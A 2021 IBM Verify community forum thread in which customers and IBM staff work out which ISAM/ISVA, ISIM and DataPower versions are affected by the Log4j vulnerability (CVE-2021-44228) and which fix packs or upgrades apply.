IBM Verify

IBM Verify

Join this online user group to communicate across Security product users and IBM experts by sharing advice and best practices with peers and staying up to date regarding product enhancements.

 View Only
Back to discussions
Expand all | Collapse all

ISAM use of log4j ?

  • 1.  ISAM use of log4j ?

    Posted Fri December 10, 2021 07:48 AM
    Hello everybody,
    Today a critical vulnerability was announced in Log4J widely used library : RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec
    As we have many java applications/product, we are trying to assess which assets could be vulnerable.

    We are unable to find if ISAM/ISVA does use log4j library.

    Does someone knows if there a place somewhere where this kind of dependencies are listed with their version ?


    Thank you,
    André

    ------------------------------
    André Leruitte
    ------------------------------


  • 2.  RE: ISAM use of log4j ?

    Posted Sun December 12, 2021 12:25 PM
    Hi André,

    The ISAM v8/9 and ISVA v10 appliances are not affect by CVE-2021-44228.
    At this time there is not an update to the X-Force signatures used by the embedded Web Application Firewall.
    Junctioned applications should be updated per their vendors' instructions.


    ------------------------------
    Nick
    IBM Security Verify Customer Support
    ------------------------------

    Original Message


  • 3.  RE: ISAM use of log4j ?

    Posted Sun December 12, 2021 05:53 PM
    Hi Nick, 

    Is this vulnerability  relevant for ISIM 6.0?


    ------------------------------
    Igor Vinogradov
    ------------------------------

    Original Message


  • 4.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 08:42 AM

    Hi Igor, regarding your question about this vulnerability (CVE-2021-44228) and ISIM.  There is a component of ISIM that contains Log4j but the impact is still being fully explored.  For now we ask that you continue monitoring this PSIRT blog for the latest information:
    https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/

    We expect there to be product specific Security Bulletins published soon, to include ISIM, IGI, and ISVG



    ------------------------------
    Daniel Barto
    ------------------------------

    Original Message


  • 5.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 06:07 PM
    FYI, Security Bulletin for ISIM, IGI, & ISVG now published:
    https://www.ibm.com/support/pages/node/6526752

    ------------------------------
    Daniel Barto
    ------------------------------

    Original Message


  • 6.  RE: ISAM use of log4j ?

    Posted Mon December 13, 2021 02:08 AM
    Hi Nick,

    Thanks a lot for your reply. This is very good news.

    I'm trying to find the same information about IBM Datapower and API Connect but I am unable to find anything until now. Do you have any idea where I could look for ?

    Regards

    ------------------------------
    André Leruitte
    ------------------------------

    Original Message


  • 7.  RE: ISAM use of log4j ?

    Posted Tue December 14, 2021 09:58 AM

    IBM DataPower Gateway is not affected by CVE-2021-44228 (LOG4J) vulnerability

     

    https://www.ibm.com/support/pages/node/6525862

     



    ------------------------------
    Alan Bratteson
    ------------------------------

    Original Message


  • 8.  RE: ISAM use of log4j ?

    Posted Mon December 13, 2021 07:48 AM
    According the below page, ISAM is in fact using log4j. To what effect it does not state. Can you confirm that it is only used internally, and not for stuff like reverse proxy logfiles etc.?

    https://www.ibm.com/support/pages/urgent-apar-information-ibm-security-access-manager-9072-firmware-upgrade

    UPDATE TO MULTIPLE DEPENDENT SOFTWARE PRODUCTS

    ...
                  libpcap                     1.5.3.11
                  log4j                         2.13.2
                  nss-softokn              3.44.0.8
    ...



    ------------------------------
    Jesper James
    PFA
    004530950933
    ------------------------------

    Original Message


  • 9.  RE: ISAM use of log4j ?

    Posted Mon December 13, 2021 02:55 PM
    Jesper,
     
    IBM is still fully investigating the repercussions of the Log4J vulnerability and an official response should be published soon.  I can however say that the reverse proxy itself is a C++ binary and does not embed any Java code, and as such will not be vulnerable.  IBM is still investigating the impact on the Advanced Access Control and Federation offerings.
     
    Thanks.
     
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access
    IBM Master Inventor

     
     
     



    Original Message


  • 10.  RE: ISAM use of log4j ?

    Posted Mon December 13, 2021 09:37 PM
    Edited by Sylvain Gilbert Mon December 13, 2021 11:10 PM
    For general information on IBM's response to Apache Log4j CVE-2021-44228 vulnerability we can all refer here:

    https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/

    "IBM Software and Systems Products
    IBM is continuing a product-by-product analysis for Log4j impacts. If an IBM Software or Systems product is impacted, there will be a bulletin posted on this blog as a remediation or fix becomes available. Such on-premise IBM products will then have to be updated by the customer"

    However, knowing that a product is NOT vulnerable (confirmed) is as equally important than if it is vulnerable as it can help decision makers decide to pull the plug or not on online services.

    ------------------------------
    Sylvain Gilbert
    ------------------------------

    Original Message


  • 11.  RE: ISAM use of log4j ?

    Posted Tue December 14, 2021 08:43 AM
    Thank you, we can see that we have been hit with multiple exploit attempts already since the 11th of December. The bad guys move fast. You should too :D

    ------------------------------
    Jesper James
    PFA
    004530950933
    ------------------------------

    Original Message


  • 12.  RE: ISAM use of log4j ?

    Posted Tue December 14, 2021 04:52 PM
    Hi Scott, does this technote means it is the definitive assessment for ISAM/ISVA, or some more updates could come in the next hours/days ?

    Security Bulletin: IBM Security Access Manager 9.0.7.1 and IBM Security Verify Access 10.0.0.0 may be affected by the log4j vulnerability (CVE-2021-44228)



    ------------------------------
    Sylvain Gilbert
    ------------------------------

    Original Message


  • 13.  RE: ISAM use of log4j ?

    Posted Tue December 14, 2021 05:23 PM
    Sylvain,
     
    This is the official, and definitive, statement from IBM for ISAM/ISVA.  We don't envisage any further updates as the in-depth investigation has been completed for the product.
     
    Thanks.
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access
    IBM Master Inventor

     
     
     



    Original Message


  • 14.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 01:56 AM

    Hi Scott,

    Does this mean that ISAM v9.0.7.2 is not impacted, as I see in the article only ISAM 9.0.7.1 and ISVA 10.0.0.0 are impacted.

    Thx in advance,
        Kristof Goossens



    ------------------------------
    Kristof Goossens
    ------------------------------

    Original Message


  • 15.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 02:24 AM
    Kristof,
     
    The ISAM 9.0.7.1 and ISVA 10.0.0.0 releases are the only ISAM/ISVA releases which could potentially be vulnerable to CVE-2021-44228.  However, 9.0.7.2 does include a version of Log4J which is vulnerable to a different issue: https://nvd.nist.gov/vuln/detail/CVE-2021-4104.  IBM is recommending that customers who are running 9.0.7.2 apply a fix-pack to address this vulnerability: see https://www.ibm.com/support/pages/node/6526432.
     
    I hope that this helps.
     
    Thanks.
     
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access
    IBM Master Inventor
     
     



    Original Message


  • 16.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 03:01 AM
    Hi Scott,

    Thx for the additional info!

    Kristof

    ------------------------------
    Kristof Goossens
    ------------------------------

    Original Message


  • 17.  RE: ISAM use of log4j ?

    Posted Fri December 17, 2021 03:37 AM
    Hello Scott,
    We are at level ISAM v9.0.2.0, is this vulnerable to  CVE-2021-44228? I specifically see that v9.0.7.0 and v10 are vulnerable. Could you please confirm?
    If yes, and if we have to upgrade to v9.0.7.2 then is it possible to perform on-top or in-place upgrade so I do not loose all my configurations?

    ------------------------------
    Naveen Paila
    ------------------------------

    Original Message


  • 18.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 08:42 AM
    Hi Scott et al.

    After the release of https://www.ibm.com/support/pages/node/6526432?myns=swgother&mynp=OCSSQRZH&mync=E&cm_sp=swgother-_-OCSSQRZH-_-E it appears there are issues with 9.0.7.1 and 9.0.7.2.

    With respect to the link above though, will there be any outage (automatic appliance/instance restarts) applying this?

    The fix is there but documentation around it is lacking.

    Any update would be appreciated.

    All the best,
    Tony

    ------------------------------
    Tony Cooke
    ------------------------------

    Original Message


  • 19.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 10:23 AM
    What if you are running ISAM 9.0.7.5?  Does the patch need applied?

    ------------------------------
    Patrick Davis
    ------------------------------

    Original Message


  • 20.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 02:56 PM
    Patrick,
     
    I don't believe that there is a 9.0.7.5 release for ISAM.  Are you asking about ISAM or a different product?
     
    Thanks.
     
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access
    IBM Master Inventor
     
    Phone: 61-7-5552-4008
    E-mail: scotte@au1.ibm.com
    1 Corporate Court
    Bundall, QLD 4217
    Australia
     
     



    Original Message


  • 21.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 03:07 PM
    I think IBM briefly released fix pack 5.  Our ISAM appliances been on it for a year.



    ------------------------------
    Patrick Davis
    ------------------------------

    Original Message


  • 22.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 03:13 PM
    Patrick,

    I can understand the confusion - but you are referring to 9.0.7.1 IF 5.  So, IBM is recommending that you upgrade to 9.0.7.2 (which should incorporate 9.0.7.1 IF 5), and then apply the fix-pack.

    Thanks.

    ------------------------------
    Scott Exton
    IBM
    Gold Coast
    ------------------------------

    Original Message


  • 23.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 03:36 PM
    Thanks Scott

    ------------------------------
    Patrick Davis
    ------------------------------

    Original Message


  • 24.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 02:20 AM
    If you plan to upgrade to 9.0.7.2, consider ISVA 10+ versions as v9.x will be out of support (very) soon.

    ------------------------------
    Cedric Servais
    ------------------------------

    Original Message


  • 25.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 09:15 AM
    We did upgrade from 9.0.7.2 to ISVA 10.0.2, but the LMI was very slow and had other issue with the new version.  We ended up rolling back to 9.0.7.1 and plan to upgrade after IBM fixes the bugs in ISVA 10.

    ------------------------------
    Patrick Davis
    ------------------------------

    Original Message


  • 26.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 09:10 AM
    Scott,

    Thanks for the responses.  I am trying to download 9.0.7.2 from IBM, but I can not find the pkg to download.  I looked on IBM password advantage and fix central and not in either place.  I don't think I can just upgrade from 9.0.7.1 to 9.0.7.2 IF 3 without the pkg.

    ------------------------------
    Patrick Davis
    ------------------------------

    Original Message


  • 27.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 02:47 PM
    Patrick,
     
     
    Thanks.
     
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access
    IBM Master Inventor

     
     
     



    Original Message


  • 28.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 02:51 PM
    Got it. Thanks!

    ------------------------------
    Patrick Davis
    ------------------------------

    Original Message


  • 29.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 10:21 AM
    we are on 9.0.7.1 IF5,  Does it have a fixpack instead of upgrading to 9.0.7.2 and then fixpack?

    Thanks Harsha

    ------------------------------
    Harsha S
    ------------------------------

    Original Message


  • 30.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 02:58 PM
    Tony,
     
    A restart of the LMI, and potentially the runtime profile for AAC/Federation, will be required.  This should happen automatically when the fix-pack is installed, but I will seek further clarification from the support team and hopefully get them to update the support page with this information.
     
    Thanks.
     
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access
    IBM Master Inventor
     
    Phone: 61-7-5552-4008
    E-mail: scotte@au1.ibm.com
    1 Corporate Court
    Bundall, QLD 4217
    Australia
     
     



    Original Message


  • 31.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 04:39 AM
    Hello Everybody,

    Does IBM plan to publish an ifix only for log4j vulnerability on 9.0.7.x ?
    It's easier to install and avoid significant non-regression tests on all our applications.
    Thanks

    Romuald

    ------------------------------
    Romuald Blondel
    ------------------------------

    Original Message


  • 32.  RE: ISAM use of log4j ?

    Posted Wed December 22, 2021 11:42 AM
    Can someone tell me if log4j is used by the RTSS?  Webseals?  Both?

    We have appliances that runs webseals and processes Federation/AAC requests via the RTSS.  We have appliances that do not have RTSS running and only running webseals.

    If we only need to apply fixpacks to the appliances that runs RTSS, that is a lot of appliances we won't have to apply fixpacks too.  So I would like to have that clarification and/or recommendation.

    Thanks

    ------------------------------
    Troy Burkle
    ------------------------------

    Original Message


  • 33.  RE: ISAM use of log4j ?

    Posted Thu December 23, 2021 04:06 AM
    It's an appliance -> apply the fix. Now.

    In summary: if you can't examine the inside, you have no way of determining if log4j is in use.  If you can't determine that, you'll have to assume that it's in use.

    ------------------------------
    José Pina Coelho
    IT Specialist at Kyndryl
    ------------------------------

    Original Message


Related Content